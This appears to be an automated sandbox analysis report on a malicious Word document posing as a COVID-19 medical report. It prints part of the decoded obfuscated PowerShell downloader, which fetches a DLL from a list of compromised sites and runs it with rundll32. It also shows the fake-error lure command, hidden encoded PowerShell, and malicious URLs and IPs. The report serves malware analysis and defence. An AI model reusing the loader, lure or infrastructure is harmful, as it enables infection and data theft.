Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $8ZG = [tYpe]("{2}{5}{0}{1}{3}{4}"-f 'TE','m.','Sy','io','.DIrECtORY','S'); $D0Cq = [TYpe]("{2}{1}{0}{3}{4}" -f'sErvICEPo','Tem.nEt.','SYs','iNtma','nAGER') ; $Jbz3yaa=$D53E + [char](64) + $R76P;$G73O=('F'+('0'+'4V')); ( Get-VarIABle ("8Z"+"g") -vAlUeON )::"crE`A`TeDiR`eCt`oRy"($HOME + (('tK'+('L'+'K'+'jl48kr')+'t'+('KLNq'+'m9')+('t'+'y9')+'t'+'KL')-replAce ('tK'+'L'),[CHAr]92));$P43W=(('U_'+'2')+'P'); ( chILdiTeM VarIABlE:d0cq ).vaLue::"s`ecURIt`YpROt`OCoL" = (('Tl'+'s1')+'2');$S82G=(('G9'+'0')+'M');$D6trw02 = (('S9'+'3')+'E');$X6_M=('D3'+'0P');$G6ajv8d=$HOME+(('{0'+'}Kjl48kr'+'{0}Nq'+('m9ty'+'9')+'{0}')-f [CHar]92)+$D6trw02+(('.d'+'l')+'l');$V35U=(('S5'+'_')+'U');$Jitoa2e=(('w]xm[vs'+'://remed'+'ii'+'s.'+'c'+'o'+'m/t/gm2X/@'+'w')+(']x'+'m[v:'+'//ava')+('dn'+'an')+('sa'+'h')+'in'+('.c'+'om')+('/'+'wp'+'-inc')+'lu'+('de'+'s/w/@')+'w'+']'+('x'+'m[')+('v://'+'sol'+'ico')+'n'+('.us'+'/alla'+'m'+'-cy')+('cle'+'-1c4')+('gn'+'/f5')+'z/'+('@'+'w]')+('x'+'m['+'v:/'+'/www.riparazi'+'on'+'i'+'-')+('radi'+'o')+'tv'+'.c'+('om'+'/so')+'ft'+('ac'+'u')+('l'+'ous/'+'DZz/')+'@'+('w'+']xm[')+('v:/'+'/')+('ww'+'w')+('.agr'+'i'+'camp'+'eg')+('gi'+'o'+'cor')+('te'+'como')+'tt'+'o.'+('it'+'/')+('wp'+'-')+('a'+'dm')+('i'+'n'+'/s7'+'p1/@w]'+'xm[')+'v'+'s:'+'//'+'ww'+'w'+('.starl'+'i'+'n')+('gtechs.com'+'/'+'GNM'+'/@w'+']xm[v')+(':'+'/'+'/hellas')+('-d'+'arms'+'tad'+'t.d'+'e')+'/c'+('gi-bin'+'/Z')+'S'+('o'+'o/'))."rEplA`ce"((('w]xm'+'[')+'v'),([array](('ds'+('e'+'wf')),('we'+('vw'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Giyrh\pugu.vsm',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ivtnyogqxjx\ctmhexvkrv.xdn',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pvbzatsazzovzkv\hcdstjffkhswof.tvm',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ipdtn\rmgx.ktd',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wxiibgduobebnp\hfpumnmgeezpt.jsh',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ndsevdxfleyh\dktakeexwon.agz',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmtjatw\czosow.gcn',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Udumexhq\tqqkqid.sqp',ShowDialogA
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation11 | Path Interception | Process Injection111 | Masquerading21 | OS Credential Dumping | Security Software Discovery1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Command and Scripting Interpreter211 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion2 | LSASS Memory | Virtualization/Sandbox Evasion2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Scripting22 | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools11 | Security Account Manager | Process Discovery1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | Exploitation for Client Execution3 | Logon Script (Mac) | Logon Script (Mac) | Process Injection111 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol14 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | PowerShell3 | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information3 | LSA Secrets | File and Directory Discovery2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Scripting22 | Cached Domain Credentials | System Information Discovery15 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Hidden Files and Directories1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Obfuscated Files or Information1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Rundll321 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | File Deletion1 | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact

Behavior Graph

Behavior Graph ID: 338773
Sample: XP-9743 Medical report COVI...
Startdate: 12/01/2021
Architecture: WINDOWS
Score: 100

Signatures on the sample node: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; 12 other signatures

Process tree as shown in the graph (numbers after a process name are the counts displayed on its node):
  • cmd.exe (started)
    signatures: Suspicious powershell command line found; Very long command line found; Encrypted powershell cmdline option found
    • powershell.exe 12 9 (started)
      DNS/IP: remediis.com 5.2.81.171, 443, 49165, 49166 ALASTYRTR Turkey; avadnansahin.com 109.232.216.177, 49167, 80 AEROTEK-ASTR Turkey
      dropped: C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll, PE32
      signature: Powershell drops PE file
      • rundll32.exe (started)
        • rundll32.exe 2 (started): Hides that the sample has been downloaded from the Internet (zone.identifier)
          • rundll32.exe 1 (started): Hides that the sample has been downloaded from the Internet (zone.identifier)
            • rundll32.exe 1 (started): Hides that the sample has been downloaded from the Internet (zone.identifier)
              • rundll32.exe 1 (started): Hides that the sample has been downloaded from the Internet (zone.identifier)
                • rundll32.exe 1 (started): Hides that the sample has been downloaded from the Internet (zone.identifier)
                  • rundll32.exe 1 (started): Hides that the sample has been downloaded from the Internet (zone.identifier)
                    • rundll32.exe 1 (started): Hides that the sample has been downloaded from the Internet (zone.identifier)
    • msg.exe (started)
  • WINWORD.EXE 293 23 (started)

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label | Link
XP-9743 Medical report COVID-19.doc | 19% | Virustotal | | Browse
XP-9743 Medical report COVID-19.doc | 14% | ReversingLabs | Script-Macro.Trojan.Heuristic |

Dropped Files

Source | Detection | Scanner | Label | Link
C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll | 100% | Joe Sandbox ML | |

Unpacked PE Files

Source | Detection | Scanner | Label | Link | Download
11.2.rundll32.exe.1c0000.0.unpack | 100% | Avira | HEUR/AGEN.1110387 | | Download File
12.2.rundll32.exe.280000.1.unpack | 100% | Avira | HEUR/AGEN.1110387 | | Download File
7.2.rundll32.exe.220000.1.unpack | 100% | Avira | HEUR/AGEN.1110387 | | Download File
14.2.rundll32.exe.270000.1.unpack | 100% | Avira | HEUR/AGEN.1110387 | | Download File
9.2.rundll32.exe.220000.1.unpack | 100% | Avira | HEUR/AGEN.1110387 | | Download File
15.2.rundll32.exe.1a0000.0.unpack | 100% | Avira | HEUR/AGEN.1110387 | | Download File
10.2.rundll32.exe.1b0000.0.unpack | 100% | Avira | HEUR/AGEN.1110387 | | Download File
14.2.rundll32.exe.250000.0.unpack | 100% | Avira | HEUR/AGEN.1110387 | | Download File
10.2.rundll32.exe.1d0000.1.unpack | 100% | Avira | HEUR/AGEN.1110387 | | Download File
15.2.rundll32.exe.1c0000.1.unpack | 100% | Avira | HEUR/AGEN.1110387 | | Download File
11.2.rundll32.exe.1e0000.1.unpack | 100% | Avira | HEUR/AGEN.1110387 | | Download File
8.2.rundll32.exe.1c0000.1.unpack | 100% | Avira | HEUR/AGEN.1110387 | | Download File
13.2.rundll32.exe.1f0000.0.unpack | 100% | Avira | HEUR/AGEN.1110387 | | Download File
9.2.rundll32.exe.200000.0.unpack | 100% | Avira | HEUR/AGEN.1110387 | | Download File
8.2.rundll32.exe.1a0000.0.unpack | 100% | Avira | HEUR/AGEN.1110387 | | Download File
13.2.rundll32.exe.210000.1.unpack | 100% | Avira | HEUR/AGEN.1110387 | | Download File

Domains

Source | Detection | Scanner | Label | Link
remediis.com | 2% | Virustotal | | Browse
avadnansahin.com | 2% | Virustotal | | Browse

URLs

Source | Detection | Scanner | Label | Link
http://avadnansahin.com | 2% | Virustotal | | Browse
http://avadnansahin.com | 0% | Avira URL Cloud | safe |
http://hellas-darmstadt.de/cgi-bin/ZSoo/ | 6% | Virustotal | | Browse
http://hellas-darmstadt.de/cgi-bin/ZSoo/ | 100% | Avira URL Cloud | malware |
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe |
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe |
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe |
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe |
https://remediis.comp | 0% | Avira URL Cloud | safe |
http://solicon.us/allam-cycle-1c4gn/f5z/ | 6% | Virustotal | | Browse
http://solicon.us/allam-cycle-1c4gn/f5z/ | 100% | Avira URL Cloud | malware |
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe |
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe |
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe |
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe |
http://avadnansahin.com/wp-includes/w/ | 0% | Avira URL Cloud | safe |
http://www.agricampeggiocortecomotto.it/wp-admin/s7p1/ | 0% | Avira URL Cloud | safe |
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | 0% | URL Reputation | safe |
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | 0% | URL Reputation | safe |
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | 0% | URL Reputation | safe |
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe |
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe |
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe |
https://remediis.com | 0% | Avira URL Cloud | safe |
http://www.riparazioni-radiotv.com/softaculous/DZz/ | 0% | Avira URL Cloud | safe |
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | 0% | URL Reputation | safe |
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | 0% | URL Reputation | safe |
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | 0% | URL Reputation | safe |
https://www.starlingtechs.com/GNM/ | 0% | Avira URL Cloud | safe |
https://sectigo.com/CPS0D | 0% | URL Reputation | safe |
https://sectigo.com/CPS0D | 0% | URL Reputation | safe |
https://sectigo.com/CPS0D | 0% | URL Reputation | safe |
http://69.49.88.46/fumwyj93myhz6vi/3lptbz7/e6hqkyw77ui/dujy6/2toe6aqef56s/cxrwnsqx/ | 0% | Avira URL Cloud | safe |
http://www.%s.comPA | 0% | URL Reputation | safe |
http://www.%s.comPA | 0% | URL Reputation | safe |
http://www.%s.comPA | 0% | URL Reputation | safe |
https://remediis.com/t/gm2X/ | 0% | Avira URL Cloud | safe |

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
remediis.com | 5.2.81.171 | true | true | | unknown
avadnansahin.com | 109.232.216.177 | true | true | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://avadnansahin.com/wp-includes/w/ | true | Avira URL Cloud: safe | unknown
http://69.49.88.46/fumwyj93myhz6vi/3lptbz7/e6hqkyw77ui/dujy6/2toe6aqef56s/cxrwnsqx/ | true | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.windows.com/pctv. | rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmp | false | | high
http://investor.msn.com | rundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmp | false | | high
http://www.msnbc.com/news/ticker.txt | rundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmp | false | | high
http://avadnansahin.com | powershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmp | true | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://hellas-darmstadt.de/cgi-bin/ZSoo/ | powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp | true | 6%, Virustotal, Browse; Avira URL Cloud: malware | unknown
http://ocsp.sectigo.com0 | powershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmp | false | URL Reputation: safe (listed 4 times) | unknown
https://remediis.comp | powershell.exe, 00000005.00000002.2093497581.0000000003C5C000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://solicon.us/allam-cycle-1c4gn/f5z/ | powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp | true | 6%, Virustotal, Browse; Avira URL Cloud: malware | unknown
http://www.litespeedtech.com | powershell.exe, 00000005.00000002.2093517208.0000000003C6E000.00000004.00000001.sdmp | false | | high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | rundll32.exe, 00000006.00000002.2092843874.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089320581.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2100702841.0000000001E87000.00000002.00000001.sdmp | false | URL Reputation: safe (listed 4 times) | unknown
http://www.hotmail.com/oe | rundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmp | false | | high
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | rundll32.exe, 00000006.00000002.2092843874.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089320581.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2100702841.0000000001E87000.00000002.00000001.sdmp | false | | high
http://www.agricampeggiocortecomotto.it/wp-admin/s7p1/ | powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | powershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmp | false | URL Reputation: safe (listed 3 times) | unknown
http://www.icra.org/vocabulary/. | rundll32.exe, 00000006.00000002.2092843874.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089320581.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2100702841.0000000001E87000.00000002.00000001.sdmp | false | URL Reputation: safe (listed 3 times) | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | powershell.exe, 00000005.00000002.2088032725.0000000002380000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2091689144.0000000002880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2092831737.00000000027A0000.00000002.00000001.sdmp | false | | high
https://remediis.com | powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | powershell.exe, 00000005.00000002.2086528973.0000000000404000.00000004.00000020.sdmp | false | | high
http://www.riparazioni-radiotv.com/softaculous/DZz/ | powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | powershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmp | false | URL Reputation: safe (listed 3 times) | unknown
https://www.starlingtechs.com/GNM/ | powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://investor.msn.com/ | rundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmp | false | | high
https://sectigo.com/CPS0D | powershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmp | false | URL Reputation: safe (listed 3 times) | unknown
http://www.piriform.com/ccleaner | powershell.exe, 00000005.00000002.2086528973.0000000000404000.00000004.00000020.sdmp | false | | high
http://www.%s.comPA | powershell.exe, 00000005.00000002.2088032725.0000000002380000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2091689144.0000000002880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2092831737.00000000027A0000.00000002.00000001.sdmp | false | URL Reputation: safe (listed 3 times) | low
https://remediis.com/t/gm2X/ | powershell.exe, 00000005.00000002.2096044095.000000001B606000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
69.49.88.46 | unknown | United States | 33734 | MPW-MACHLINK-NETUS | true
109.232.216.177 | unknown | Turkey | 42807 | AEROTEK-ASTR | true
71.72.196.159 | unknown | United States | 10796 | TWC-10796-MIDWESTUS | true
5.2.81.171 | unknown | Turkey | 3188 | ALASTYRTR | true

General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 338773
Start date: 12.01.2021
Start time: 20:30:12
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 39s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: XP-9743 Medical report COVID-19.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winDOC@26/7@2/4
EGA Information: Failed
HDC Information:
  • Successful, ratio: 33.2% (good quality ratio 31.6%)
  • Quality average: 71.6%
  • Quality standard deviation: 24.9%
HCA Information:
  • Successful, ratio: 72%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .doc
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Found warning dialog
  • Click Ok
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
  • TCP Packets have been reduced to 100
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time | Type | Description
20:30:36 | API Interceptor | 1x Sleep call for process: msg.exe modified
20:30:37 | API Interceptor | 32x Sleep call for process: powershell.exe modified
20:30:41 | API Interceptor | 867x Sleep call for process: rundll32.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      69.49.88.46AG60273928I_COVID-19_SARS-CoV-2.docGet hashmaliciousBrowse
                      • 69.49.88.46/kdd8h70lwp/lfu3p05/u2kanr3/
                      FQ5754217297FF.docGet hashmaliciousBrowse
                      • 69.49.88.46/2hsmx8qypf/8iv55uq7hpxe/hf9tz7/
                      71.72.196.159FILE-092020.docGet hashmaliciousBrowse
                      • 71.72.196.159/Asgu9G/UPAJk1H/k1wB2h2IhMQGy9M4O/CwukNROTLhDmT5iz7yr/QNOGQRhP/
                      X5w6zls.exeGet hashmaliciousBrowse
                      • 71.72.196.159/YmBvqXK/A1bXsLoMSYg/i0gaWBtL9c/yD6C9feh/
                      #U5909#U531620.09.docGet hashmaliciousBrowse
                      • 71.72.196.159/HisuDo3My4/
                      #U5909#U531620-09.docGet hashmaliciousBrowse
                      • 71.72.196.159/IEHZ5/HVlPRDwFoj/OuQtgxrIROu80/9t0syM1s3J/
                      BCRYO2020.09.19.docGet hashmaliciousBrowse
                      • 71.72.196.159/UdroxO4ouHCZo3/SPUpyAXBlZAJ/kR4LZr6qJHOM3/9tr1e4XNde6jxg22B/j2TVTGpcHCpnic1/
                      drdgPfOU36.exeGet hashmaliciousBrowse
                      • 71.72.196.159/6YX6sQtKK6MLta/TbNsyU7EbVPMjL/0MoOi2xkKCNW7y67b/USvDoTSxSZ/BulSaK/
                      cC.exeGet hashmaliciousBrowse
                      • 71.72.196.159/LLRDDCScx1Byk2D/krMwjOaF56Uc9Il6eMD/WuP6hJZcQa4/5p5T7L/
                      #U304b#U3089#U306e#U5909#U66f419.docGet hashmaliciousBrowse
                      • 71.72.196.159/3oAMQ7MNt66lIE8EI/DizHtXLtgQHqx/U2NH3hw0GWPotmCV/dMZCjcyGRF/qUw6hgI/FwMSWVK67N4mSEoC/
                      LTB.docGet hashmaliciousBrowse
                      • 71.72.196.159/QxJ68bj/OcYZ8J9RWfz7qwepeY/7Zys/K1Bpu/5CRfSZCJqSBtKcz/dhIXBeS6vLJR/
                      #U6700#U65b0#U306e#U69cb#U9020#U56f3.docGet hashmaliciousBrowse
                      • 71.72.196.159/JMk30NNrO1ReTb/6XR5dMIuJFNZfcR/yg0fR2fj6mXvduKb/
                      HROF2020.docGet hashmaliciousBrowse
                      • 71.72.196.159/EMc53XBYQbN5Jl/
                      #U304b#U3089#U306e#U5909#U66f49#U6708.docGet hashmaliciousBrowse
                      • 71.72.196.159/1ieklOTBS/ak8HNcj/
                      DAT_2020_09_7444352632.docGet hashmaliciousBrowse
                      • 71.72.196.159/cv2mWGF5/67dqj/ZkWPeQbBjvdWajsuvx/lYL2/TljK64Me1bfzHxBI/
                      Dokumentation_FC_41232269.docGet hashmaliciousBrowse
                      • 71.72.196.159/ejSg6gT/pSnsS3gAqTGFHUm9V/Jg8Kv3cnCG2Miq94/Sf9xZ/
                      BIZ_18_09_2020_4070550449.docGet hashmaliciousBrowse
                      • 71.72.196.159/tiVhuDLoHxS/G2H7AH/
                      Betrag_2020_09_4036385628.docGet hashmaliciousBrowse
                      • 71.72.196.159/RQWehX/fgtv5/htJbK7vQCVUSRwZJeE/
                      SCNVS2020.09.docGet hashmaliciousBrowse
                      • 71.72.196.159/b9v6oT61Mzfa1oQAP/IIlXlIMvsnl/
                      ZZLEJDXT8LH-20200918.docGet hashmaliciousBrowse
                      • 71.72.196.159/v4zRqawC6/myK9u1BaFBM0ak/
                      #U5909#U531609_18.docGet hashmaliciousBrowse
                      • 71.72.196.159/w5aqN3cMRoz5Eq/
                      INF_18_09_2020.docGet hashmaliciousBrowse
                      • 71.72.196.159/5U1wQcRoWdLiEGx/gIcTfWkFIkHPs5yEqC/

                      Domains

                      No context

                      ASN


                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4AB68257-B28F-4AE5-86AD-026C320EA73C}.tmp
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):1024
                      Entropy (8bit):0.05390218305374581
                      Encrypted:false
                      SSDEEP:3:ol3lYdn:4Wn
                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
